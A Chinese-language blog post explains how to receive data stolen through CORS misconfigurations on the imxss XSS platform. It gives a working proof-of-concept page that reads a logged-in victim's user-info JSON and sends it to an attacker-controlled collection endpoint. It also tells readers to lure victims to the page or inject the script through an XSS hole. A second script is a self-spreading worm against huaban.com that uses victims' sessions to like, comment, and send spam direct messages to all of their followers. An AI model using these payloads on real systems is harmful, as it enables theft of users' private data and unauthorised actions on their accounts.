使用imxss接收跨域资源共享漏洞(CORS)窃取的信息

工具

imxss是什么?
ImXSS是国内首套Java研发的Xss跨站脚本测试平台。ImXSS前身是XssAPP,秉承高效、快速、稳定、易用的原则。主要用于技术研究与交流。

源码地址:https://gitee.com/coodyer/imxss

imxss主要是一个跨站利用平台,当然,我觉得它可以做得更多,比如,也可以当成CORS利用平台。本片文章主要介绍如何使用imxss平台接收跨域资源共享漏洞(CORS)窃取的信息。

搭建imxss的过程请自行查看源码上的说明文档,此处略。同样的,CORS漏洞原理此处也省略,仅讲数据接收。

本文基于imxss最初始的公共模块进行利用,各位大佬可以自行扩展。

数据接收平台:


CORS poc如下:

poc.html

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>
  var req = new XMLHttpRequest(); 
req.onload = reqListener; 
req.open('get','https://wwww.xxxx.com/query_user_info.json',true); 
req.withCredentials = true;
req.send();

function reqListener() {
    var req = new XMLHttpRequest(); 
    req.open('get','http://your_domain.com/imxss/s/api_370.html?text='+encodeURI(this.responseText),true);
    req.withCredentials = true;
    req.send();
};

  </script>
  </body>
</html>

把poc.html挂在自己的服务器下,让受害者点击或浏览,或者把poc.html中script标签包含的部分插入到存在xss漏洞的地方,受害者浏览后,就会把数据发往imxss平台。

效果如下:

更高级的利用请参考:

蠕虫代码:

<html>
<head>
    <meta http-equiv="X-UA-Compatible" content="IE=edge;" />
    <title>HI HUABAN IAMANEWBOTNAMEDCORSBOT</title>
    <script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
</head>
<body>
<script>
$(document).ready(function(){
    var myfood = '940838068';
    hb = {};
    hb.dmsend = function(user_id, msg){
        $.ajax({url: 'http://huaban.com/dm/send/',
            type: 'POST',
            xhrFields: {withCredentials: true},
            data: 'to_user_id=' + user_id + '&text=' + msg,
            success: function(c){$('#t').text(c);}
        });
    };

    hb.like = function(cb){
        $.ajax({url: 'http://huaban.com/pins/' + myfood + '/like/',
            type: 'POST',
            xhrFields: {withCredentials: true},
            dataType: 'json',
            beforeSend: function(request) {
                request.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                request.setRequestHeader("X-Request", "JSON");
            },
            success: cb
        });
    };

    hb.comment = function(cb){
        $.ajax({url: 'http://huaban.com/pins/' + myfood + '/comments/',
            type: 'POST',
            xhrFields: {withCredentials: true},
            dataType: 'json',
            beforeSend: function(request) {
                request.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                request.setRequestHeader("X-Request", "JSON");
            },
            data: 'text=CORSBOTLIKEIT' + Math.random().toString(),
            success: cb
        });
    };

    hb.followuserids = function(urlname, cb){
        $.ajax({url: 'http://huaban.com/' + urlname + '/followers/?limit=50',
            type: 'GET',
            xhrFields: {withCredentials: true},
            dataType: 'json',
            beforeSend: function(request) {
                request.setRequestHeader("X-Requested-With", "XMLHttpRequest");
                request.setRequestHeader("X-Request", "JSON");
            },
            success: cb
        });
    };

    hb.like(cb = function(c){
        hb.comment(cb = function(c){
            var urlname = c.comment.user.urlname;
            $('#t').text(urlname);
            hb.followuserids(urlname, cb = function(c){
                var ids = Array();
                for(i in c.users){
                    var user_id = c.users[i].user_id;
                    ids.push(user_id);
                    hb.dmsend(user_id, 'YESIAMANEWBOTNAMEDCORSBOT' + Math.random().toString() + 'UCANEXPLOREMEAT: HTTP://HUABAN.COM.AL3RT.IO/');
                }
            });
        });
    });
});
</script>
</body>
</html>
微信 OR 支付宝 扫描二维码
为本文作者 打个赏
pay_weixin pay_zhifubao
如果文章对您有帮助,欢迎打赏赞助作者
没有评论

发表评论

文章
一次攻防实战演习复盘总结

转自:君哥的体历 2019Q1做了一次内部攻防演习,做了一次复盘总结。前段时间参加了几家机构的HW防 …

文章
我的CSP绕过思路及总结

Author: evoA@Syclover CSP简介 内容安全策略(CSP)是一种web应用技术用 …

工具
最佳黑客和安全专业人员黑客工具列表2018

原文:https://kalilinuxtutorials.com/best-hacking-too …